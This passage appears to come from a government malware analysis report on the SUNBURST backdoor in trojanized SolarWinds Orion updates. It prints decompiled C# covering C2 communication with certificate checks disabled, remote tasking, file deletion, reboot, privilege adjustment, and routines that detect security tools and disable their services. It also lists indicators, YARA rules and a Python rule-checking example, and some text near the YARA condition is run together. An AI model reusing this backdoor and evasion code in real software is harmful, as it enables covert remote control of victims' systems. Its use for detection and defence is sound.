                        httpWebRequest1.Accept = s3;
                        continue;
                    case 6116246686670134098:
                        httpWebRequest1.ContentType = s3;
                        continue;
                    case 7574774749059321801:
                        httpWebRequest1.UserAgent = s3;
                        continue;
                    case 8873858923435176895:
                        if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)
                        {
                            httpWebRequest1.ServicePoint.Expect100Continue = true;
                            continue;
                        }
                        httpWebRequest1.Expect = s3;
                        continue;
                    case 9007106680104765185:
                        httpWebRequest1.Referer = s3;
                        continue;
                    case 11266044540366291518:
                        ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());
                        httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;
                        httpWebRequest1.KeepAlive = hash != 14226582801651130532UL && httpWebRequest1.KeepAlive;
                        continue;
                    case 15514036435533858158:
                        httpWebRequest1.set_Date(DateTime.Parse(s3));
                        continue;
                    case 16066522799090129502:
                        httpWebRequest1.set_Date(DateTime.Parse(s3));
                        continue;
                    default:
                        continue;
                }
            }
        }
    }
    // The remainder of the function is not reproduced in the report.
}
--End UploadSystemDescription Function--

Note the ServerCertificateValidationCallback installed above, which unconditionally returns true: certificate validation on the connection to the C2 server is disabled, so the implant will complete a TLS session with any endpoint that answers, whatever certificate it presents.

SUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file hashes, and reboot the victim system.

**RUN SPECIFIED TASKS**

The "ExecuteEngine" function is a core function that uses the "job"
variable to carry out tasks for the adversary. This function can run tasks that consist of command line arguments, alter the registry (to maintain persistence, etc.), collect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload:

--Begin ExecuteEngine Function--
private int ExecuteEngine(
    OrionImprovementBusinessLayer.HttpHelper.JobEngine job,
    string cl,
    out string result)
{
    result = (string) null;
    int num = 0;
    string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);
    try
    {
        if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))
            num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);
        switch (job)
        {
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:
                int delay;
                OrionImprovementBusinessLayer.Job.SetTime(args, out delay);
                this.delay = delay;
                break;
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:
                OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);
                break;
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:
                OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
                break;
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:
                num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);
                break;
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:
                OrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);
                break;
            case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:
                OrionImprovementBusinessLayer.Job.KillTask(args);
                break;
        }
        return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ? OrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;
    }
    catch (Exception ex)
    {
        if (!string.IsNullOrEmpty(result))
            result += "\n";
        result += ex.Message;
        return ex.HResult;
    }
}
--End ExecuteEngine Function--

**TERMINATE PROCESSES**

--Begin KillTask Function--
public static void KillTask(string[] args) => Process.GetProcessById(int.Parse(args[0])).Kill();
--End KillTask Function--

**DELETE FILE**

--Begin DeleteFile Function--
public static void DeleteFile(string[] args) => System.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));
--End DeleteFile Function--

**COMPUTE FILE HASHES**

--Begin GetFileHash Function--
public static int GetFileHash(string[] args, out string result)
{
    result = (string) null;
    string path = Environment.ExpandEnvironmentVariables(args[0]);
    using (MD5 md5 = MD5.Create())
    {
        using (FileStream fileStream = System.IO.File.OpenRead(path))
        {
            byte[] hash = md5.ComputeHash((Stream) fileStream);
            if (args.Length > 1)
                return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;
            result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);
        }
    }
    return 0;
}
--End GetFileHash Function--

**REBOOT SYSTEM**

--Begin RebootComputer Function--
public static bool RebootComputer()
{
    bool flag = false;
    try
    {
        bool previousState = false;
        string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip("ph2eifo3n5utg1j8d94qrvbmk0sal76c");
        if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))
            return flag;
        flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U, true, true, 2147745794U);
        OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);
        return flag;
    }
    catch (Exception ex)
    {
        return flag;
    }
}
--End RebootComputer Function--

**ADJUST PROCESS PRIVILEGES**

The SetProcessPrivilege function is used to adjust privileges on the victim system; as the code shows, it opens the token of the current process (the process hosting the malicious DLL) and enables or disables the named privilege on it. A process may need such an elevated privilege to accomplish its designed task, as RebootComputer does before calling InitiateSystemShutdownEx.

--Begin SetProcessPrivilege Function--
public static bool SetProcessPrivilege(
    string privilege,
    bool newState,
    out bool previousState)
{
    bool flag = false;
    previousState = false;
    try
    {
        IntPtr zero = IntPtr.Zero;
        OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new OrionImprovementBusinessLayer.NativeMethods.LUID();
        Luid.LowPart = 0U;
        Luid.HighPart = 0U;
        if (!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(), TokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))
            return false;
        if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))
        {
            OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
            return false;
        }
        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
        NewState.PrivilegeCount = 1U;
        NewState.Privilege.Luid = Luid;
        NewState.Privilege.Attributes = newState ? 2U : 0U;
        uint ReturnLength = 0;
        OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint) Marshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);
        previousState = (PreviousState.Privilege.Attributes & 2U) > 0U;
        flag = true;
        OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
        return flag;
    }
    catch (Exception ex)
    {
        return flag;
    }
}

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID
{
    public uint LowPart;
    public uint HighPart;
}

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID_AND_ATTRIBUTES
{
    public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;
    public uint Attributes;
}

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct TOKEN_PRIVILEGE
{
    public uint PrivilegeCount;
    public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;
}
--End SetProcessPrivilege Function--

**BLOCK LIST CHECKING FUNCTIONS**

The Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls the UpdateNotification() function. If that returns "False", indicating that one of the hard-coded block list processes is running, the SUNBURST malware will not initiate its C2 session.
The malicious class "OrionImprovementBusinessLayer", containing the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the malicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.

--Begin Update Function--
private static void Update()
{
    bool flag1 = false;
    OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new OrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId, OrionImprovementBusinessLayer.domain4);
    OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;
    Thread thread = (Thread) null;
    bool last = true;
    OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx = OrionImprovementBusinessLayer.AddressFamilyEx.Unknown;
    int num1 = 0;
    bool flag2 = true;
    OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();
    Random random = new Random();
    int num2 = 0;
    if (!OrionImprovementBusinessLayer.UpdateNotification())
        return;
    OrionImprovementBusinessLayer.svcListModified2 = false;
    for (int index = 1; index <= 3 && !flag1; ++index)
    {
        OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);
        if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
        {
            if (OrionImprovementBusinessLayer.svcListModified1)
                flag2 = true;
            num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0;
            string hostName;
            switch (OrionImprovementBusinessLayer.status)
            {
                case OrionImprovementBusinessLayer.ReportStatus.New:
                    hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);
                    break;
                case OrionImprovementBusinessLayer.ReportStatus.Append:
                    hostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);
                    break;
                default:
                    goto label_27;
            }
            // The remainder of the function is not reproduced in the report.
        }
    }
}
--End Update Function--

The UpdateNotification() function returns "False" if any process on the hard-coded block list is running on the target system. It does so by calling the TrackProcesses function detailed below.

--Begin UpdateNotification Function--
private static bool UpdateNotification()
{
    int num = 3;
    while (num-- > 0)
    {
        OrionImprovementBusinessLayer.DelayMin(0, 0);
        if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
            return false;
        if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))
            return true;
    }
    return false;
}
--End UpdateNotification Function--

The "TrackProcesses" function queries the list of running processes on the target system and passes it to the "SearchAssemblies" function, which hashes the process names and compares the resulting hashes to the hard-coded process hash list stored in the list "assemblyTimeStamps." If any of the target processes are running, the function returns True. It also searches for certain services and attempts to disable them.

--Begin TrackProcesses Function--
public static bool TrackProcesses(bool full)
{
    Process[] processes = Process.GetProcesses();
    if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))
        return true;
    bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);
    return !flag & full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;
}
--End TrackProcesses Function--

The "SearchAssemblies" function, called by TrackProcesses, enumerates the running processes to determine whether any of the hashed processes included in the process block list are currently running on the target system.

--Begin SearchAssemblies Function--
private static bool SearchAssemblies(Process[] processes)
{
    for (int index = 0; index < processes.Length; ++index)
    {
        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
        if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)
            return true;
    }
    return false;
}
--End SearchAssemblies Function--

The "SearchServices" function, called by TrackProcesses, searches the running services to determine whether any of them correspond to the hard-coded block list target process hashes. It attempts to disable these services.

--Begin SearchServices Function--
private static bool SearchServices(Process[] processes)
{
    for (int index = 0; index < processes.Length; ++index)
    {
        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
        foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)
        {
            if (Array.IndexOf<ulong>(svc.timeStamps, hash) != -1)
            {
                object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;
                bool flag = false;
                try
                {
                    Monitor.Enter(obj, ref flag);
                    if (!svc.running)
                    {
                        OrionImprovementBusinessLayer.svcListModified1 = true;
                        OrionImprovementBusinessLayer.svcListModified2 = true;
                        svc.running = true;
                    }
                    if (!svc.disabled)
                    {
                        if (!svc.stopped)
                        {
                            if (svc.Svc.Length != 0)
                            {
                                OrionImprovementBusinessLayer.DelayMin(0, 0);
                                OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);
                                svc.disabled = true;
                                svc.stopped = true;
                            }
                        }
                    }
                }
                finally
                {
                    if (flag)
                        Monitor.Exit(obj);
                }
                // The remainder of the function is not reproduced in the report.
            }
        }
    }
}
--End SearchServices Function--

Screenshots

Figure 1 - The modified module with a new class function named "OrionImprovementBusinessLayer."

Figure 2 - The code snippet contains the subdomains and other strings used to construct the C2 domains.

avsvmcloud.com

Tags: command-and-control
Relationships
avsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

Description
The subdomain for "SolarWinds.Orion.Core.BusinessLayer.dll."
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600

Tags: dropper

Details
Name: SolarWinds-Core-v2019.4.5220-Hotfix5.msp
Size: 214831104 bytes
Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Installation Database, Subject: SolarWinds Orion Core Services 2019.4, Author: SolarWinds Worldwide, LLC., Keywords: Installer, Comments: This installer database contains the logic and data required to install SolarWinds Orion Core Services 2019.4., Create Time/Date: Tue Mar 24 11:55:04 2020, Name of Creating Application: Windows Installer XML Toolset (3.9.1208.0), Security: 4, Template: Intel;1033, Last Saved By: Intel;1033, Revision Number: {079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{DA36F8E2-99FC-44DF-B011-09F6B063B0F7}, Number of Pages: 200, Number of Characters: 152174623
MD5: 02af7cec58b9a5da1c542b5a32151ba1
SHA1: 1b476f58ca366b54f34d714ffce3fd73cc30db1a
SHA256: d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600
SHA512: f40fd5d94791f18eed59dc78d12acc52f4a65dfdf8c819d6957de8059e0e127160e0a21320845340932a54f9c639c42b2c815558b2d0cec111e06aa5c8908ea4
ssdeep: 3145728:yMbnCpAK7nuv7xYiq0bC4zheqeRHuCieBVZNP7WJOQeXt+9riYBaeIBjSxTusL:yMbCp7uf3GnqfCVrNPgLrW4GoxSG
Entropy: 7.998885

Antivirus
No matches found.

YARA Rules
No matches found.

ssdeep Matches
No matches found.

Relationships
d0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

Description
This file is a Microsoft Windows Installer Patch file that has been identified as a SUNBURST installer named "SolarWinds-Core-v2019.4.5220-Hotfix5.msp." This file contains legitimate SolarWinds Orion update components, the modified DLL "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77) and a legitimate configuration file.
The hotfix is typically delivered to the SolarWinds Orion application as an update for the "SolarWinds.Orion.Core.BusinessLayer.dll" module. In this case, when the update is applied, it will overwrite the non-malicious module, replacing it with the trojanized version and providing the attacker with the same level of access as described in the analysis of "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77."

ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6

Tags: backdoor, trojan

Details
Name: SolarWinds.Orion.Core.BusinessLayer.dll
Size: 1028072 bytes
Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 846e27a652a5e1bfbd0ddd38a16dc865
SHA1: d130bd75645c2433f88ac03e73395fba172ef676
SHA256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6
SHA512: c26e275b4232be844f6c4062a4f42413099452085060ed4080b880b52800428cd32f69271c98977fa979a89355fbb3b485855ca3d51499bca12dfbf8c3168d2f
ssdeep: 12288:5JKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+BYvjenWHuhh9c0g8vkzK19Q:vEfDbO97P8TrK0YbenWH4c0g8vkzK19
Entropy: 5.580054

Antivirus
Ahnlab: Backdoor/Win32.SunBurst
Antiy: Trojan[Backdoor]/MSIL.Agent
Avira: TR/Sunburst.A
BitDefender: Trojan.Sunburst.A
Clamav: Win.Countermeasure.Sunburst-9809152-0
Comodo: Backdoor
Cyren: W32/MSIL_SunBurst.A.gen!Eldorado
ESET: a variant of MSIL/SunBurst.A trojan
Emsisoft: Trojan.Win32.Sunburst (A)
Ikarus: Backdoor.Sunburst
K7: Trojan ( 00574a531 )
Lavasoft: Trojan.Sunburst.A
McAfee: Trojan-sunburst
Microsoft Security Essentials: Trojan:MSIL/Solorigate.BR!dha
NANOAV: Trojan.Win32.SunBurst.iduxyv
Sophos: Mal/Sunburst-A
Symantec: Backdoor.Sunburst
Systweak: trojan-backdoor.sunburst-r
TrendMicro: Backdoo.6F8C6A1E
TrendMicro House Call: Backdoo.6F8C6A1E
VirusBlokAda: TScope.Trojan.MSIL
Zillya!: Trojan.SunBurst.Win32.1

YARA Rules

* rule CISA_10318927_01 : trojan rat SOLAR_FIRE
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10318927"
        Date = "2020-12-13"
        Last_Modified = "20201213_2145"
        Actor = "n/a"
        Category = "TROJAN RAT"
        Family = "SOLAR_FIRE"
        Description = "This signature is based off of unique strings embedded within the modified Solar Winds app"
        MD5_1 = "b91ce2fa41029f6955bff20079468448"
        SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
        MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865"
        SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
    strings:
        $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }
        $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }
        $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D }
        $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 }
    condition:
        all of them
}

* rule FireEye_20_00025668_01 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
        $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
        $fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
        $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
        $fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
        $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
        $fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
        $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
        $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
    condition:
        $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )
}

* rule FireEye_20_00025668_02 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $a = "0y3Kzy8BAA==" wide
        $aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
        $ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
        $ac = "C88sSs1JLS4GAA==" wide
        $ad = "C/UEAA==" wide
        $ae = "C89MSU8tKQYA" wide
        $af = "8wvwBQA=" wide
        $ag = "cyzIz8nJBwA=" wide
        $ah = "c87JL03xzc/LLMkvysxLBwA=" wide
        $ai = "88tPSS0GAA==" wide
        $aj = "C8vPKc1NLQYA" wide
        $ak = "88wrSS1KS0xOLQYA" wide
        $al = "c87PLcjPS80rKQYA" wide
        $am = "Ky7PLNAvLUjRBwA=" wide
        $an = "06vIzQEA" wide
        $b = "0y3NyyxLLSpOzIlPTgQA" wide
        $c = "001OBAA=" wide
        $d = "0y0oysxNLKqMT04EAA==" wide
        $e = "0y3JzE0tLknMLQAA" wide
        $f = "003PyU9KzAEA" wide
        $h = "0y1OTS4tSk1OBAA=" wide
        $i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
        $j = "c8rPSQEA" wide
        $k = "c8rPSfEsSczJTAYA" wide
        $l = "c60oKUp0ys9JAQA=" wide
        $m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
        $n = "8yxJzMlMBgA=" wide
        $o = "88lMzygBAA==" wide
        $p = "88lMzyjxLEnMyUwGAA==" wide
        $q = "C0pNL81JLAIA" wide
        $r = "C07NzXTKz0kBAA==" wide
        $s = "C07NzXTKz0nxLEnMyUwGAA==" wide
        $t = "yy9IzStOzCsGAA==" wide
        $u = "y8svyQcA" wide
        $v = "SytKTU3LzysBAA==" wide
        $w = "C84vLUpOdc5PSQ0oygcA" wide
        $x = "C84vLUpODU4tykwLKMoHAA==" wide
        $y = "C84vLUpO9UjMC07MKwYA" wide
        $z = "C84vLUpO9UjMC04tykwDAA==" wide
    condition:
???($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an)) } ssdeep Matches 94 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 PE Metadata Compile Date 2020-05-11 17:32:40-04:00 Import Hash dae02f32a21e03ce65412f6e56942daa Company Name SolarWinds Worldwide, LLC. File Description SolarWinds.Orion.Core.BusinessLayer Internal Name SolarWinds.Orion.Core.BusinessLayer.dll Legal Copyright Copyright ? 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. Original Filename SolarWinds.Orion.Core.BusinessLayer.dll Product Name SolarWinds.Orion.Core.BusinessLayer Product Version 2020.2.5300.12432 PE Sections MD5 Name Raw Size Entropy 87b3389568887539d8c12033e01bcbda header 512 2.901277 58ca620058a1e26cda220dcb83f4eb26 .text 1018368 5.567638 1d816f4a16b05559313aa30a0d3532d6 .rsrc 1536 3.008439 0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910 Description This file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. This embedded SUNBURST code contains the same functions as "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital certificate. 
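As an added example (not part of the CISA report or of FireEye's rule), the Python below shows how the _encoded and _plain string pairs in FireEye_20_00025668_01 relate, and evaluates that rule's condition against constructed buffers. It assumes SUNBURST's string obfuscation is base64 over a raw deflate stream, a documented property of the backdoor that this report itself does not state; the string values are copied from the rule above.

```python
import base64
import zlib

# String pairs copied from rule FireEye_20_00025668_01: the "wide" base64 form the rule
# matches in the obfuscated binary, and the raw byte form the rule gives as hex.
RULE_PAIRS = {
    "cmd_regex": (
        "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA",
        bytes.fromhex("5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D "
                      "7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D"),
    ),
    "fake_orion_event": (
        "U3ItS80rCaksSFWyUvIvyszPU9IBAA==",
        bytes.fromhex("22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C"),
    ),
    "fake_orion_eventmanager": (
        "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==",
        bytes.fromhex("22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C"),
    ),
    "fake_orion_message": (
        "U/JNLS5OTE9VslKqNqhVAgA=",
        bytes.fromhex("22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22"),
    ),
}

# $fnv_xor from the same rule: the 8-byte constant the rule's description calls a "magic byte xor".
FNV_XOR = bytes.fromhex("67 19 D8 A7 3B 90 AC 5B")


def sunburst_decode(encoded: str) -> bytes:
    """Undo the string obfuscation (assumed: base64 over a raw deflate stream, i.e.
    .NET DeflateStream output without a zlib header; hence the negative wbits)."""
    return zlib.decompress(base64.b64decode(encoded), -zlib.MAX_WBITS)


def verify_rule_pairs(pairs=RULE_PAIRS) -> dict:
    """Decode every *_encoded string and check that the rule's *_plain bytes occur in
    the result. Returns {name: decoded bytes}; raises ValueError if a pair disagrees,
    which would mean the two forms in the rule do not describe the same string."""
    decoded = {}
    for name, (encoded, plain) in pairs.items():
        text = sunburst_decode(encoded)
        if plain not in text:
            raise ValueError(f"{name}: plain form not found in decoded string {text!r}")
        decoded[name] = text
    return decoded


def matches_fireeye_01(buf: bytes) -> bool:
    """Evaluate the condition of FireEye_20_00025668_01 against a raw byte buffer.
    YARA 'wide' strings are matched as UTF-16LE; 'and' binds tighter than 'or', so the
    condition reads ($fnv_xor and cmd_regex) or (event and eventmanager and message)."""
    def wide(s: str) -> bool:
        return s.encode("utf-16-le") in buf

    def plain(b: bytes) -> bool:
        return b in buf

    p = RULE_PAIRS
    cmd = wide(p["cmd_regex"][0]) or plain(p["cmd_regex"][1])
    event = wide(p["fake_orion_event"][0]) or plain(p["fake_orion_event"][1])
    manager = wide(p["fake_orion_eventmanager"][0]) or plain(p["fake_orion_eventmanager"][1])
    # The rule's last group uses 'and', not 'or': both forms of the message string
    # must be present for that branch to fire.
    message = wide(p["fake_orion_message"][0]) and plain(p["fake_orion_message"][1])
    return (FNV_XOR in buf and cmd) or (event and manager and message)


def constructed_samples() -> dict:
    """Constructed buffers (not real file content): one per branch of the rule, plus a
    near miss that carries the message string in only one of its two forms."""
    p = RULE_PAIRS
    return {
        "xor_branch": b"\x00" * 16 + FNV_XOR + p["cmd_regex"][0].encode("utf-16-le") + b"\x00" * 16,
        "orion_branch": (p["fake_orion_event"][1] + p["fake_orion_eventmanager"][1]
                         + p["fake_orion_message"][0].encode("utf-16-le") + p["fake_orion_message"][1]),
        "near_miss": (p["fake_orion_event"][1] + p["fake_orion_eventmanager"][1]
                      + p["fake_orion_message"][1]),
    }


if __name__ == "__main__":
    for name, text in verify_rule_pairs().items():
        print(f"{name:24s} -> {text!r}")
    for name, buf in constructed_samples().items():
        print(f"{name:12s} matches: {matches_fireeye_01(buf)}")
```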
019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134

Tags: backdoor, trojan

Details
  Name: SolarWinds.Orion.Core.BusinessLayer.dll
  Size: 1028072 bytes
  Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
  MD5: 2c4a910a1299cdae2a4e55988a2f102e
  SHA1: 2f1a5a7411d015d01aaee4535835400191645023
  SHA256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134
